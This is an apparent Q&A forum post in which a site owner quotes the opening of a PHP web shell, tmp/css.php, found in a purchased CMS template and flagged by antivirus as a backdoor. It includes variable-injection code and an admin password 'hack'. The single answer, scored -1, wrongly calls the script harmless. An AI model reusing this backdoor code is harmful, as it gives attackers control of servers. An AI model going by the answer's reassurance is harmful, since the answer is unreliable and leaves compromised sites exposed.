# trojan horse script? on my server

Tags: php, web-hosting, virus, trojan

I have recently purchased a template for a cms system online and asked the developers to install it for me, it wasnt a cheap template either so im a bit suprised that when i was doing a back up of my files (through filezilla to my PC), my AVG antivirus prompted a detection for a trojan horse PHP/BackDoor.AG file as a threat and this file is originating from tmp/css.php within the files which have been uploaded to my server.

The script looks like this:

```
    error_reporting(7);
 @set_magic_quotes_runtime(0);ob_start(); 
$mtime = explode(' ', microtime()); 
$starttime = $mtime[1] + $mtime[0]; 
define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/'); 
//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 ); 
define('IS_WIN', DIRECTORY_SEPARATOR == '\\'); 
define('IS_COM', class_exists('COM') ? 1 : 0 ); 
define('IS_GPC', get_magic_quotes_gpc()); $dis_func = get_cfg_var('disable_functions'); define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 ); 
@set_time_limit(0);

    foreach(array('_GET','_POST') as $_request) {  
foreach($$_request as $_key => $_value) {  
if ($_key{0} != '_') {  
if (IS_GPC) {  
$_value = s_array($_value);
} $$_key = $_value; 
}}}/*===================== Â³ÃŒÃ Ã²Ã…Ã¤Ã–Ãƒ =====================*/

    $admin = array(); 
// ÃŠÃ‡Â·Ã±Ã Ã¨Ã’ÂªÃƒÃœÃ‚Ã«Ã‘Ã©Ã–Â¤, true Ã?ÂªÃ Ã¨Ã’ÂªÃ‘Ã©Ã–Â¤, false Ã?ÂªÃ–Â±Â½Ã“Â½Ã¸ÃˆÃ«.Ã Ã‚ÃƒÃ¦Ã‘Â¡Ã Ã®Ã”Ã²Ã?Ã?Ã Â§ $admin['check'] = false; 
// ÃˆÃ§Â¹Ã»Ã Ã¨Ã’ÂªÃƒÃœÃ‚Ã«Ã‘Ã©Ã–Â¤,Ã‡Ã«Ã Ã?Â¸Ã„ÂµÃ‡Ã‚Â½ÃƒÃœÃ‚Ã« $admin['pass']  = 'hack';
```

I have no idea what this means, there is more code, if any body wants to take a look i can post a link to the whole thing. I just need to know wether or not to delete it from my web host.

Any help with this, i will forever greatful!! thanks

Answer (score -1):

The code is just a really ugly "un-magic-quoter" script. the comments look like they've been munched through bad Unicode encoding, possibly more than once.

Otherwise, the script seems harmless to me.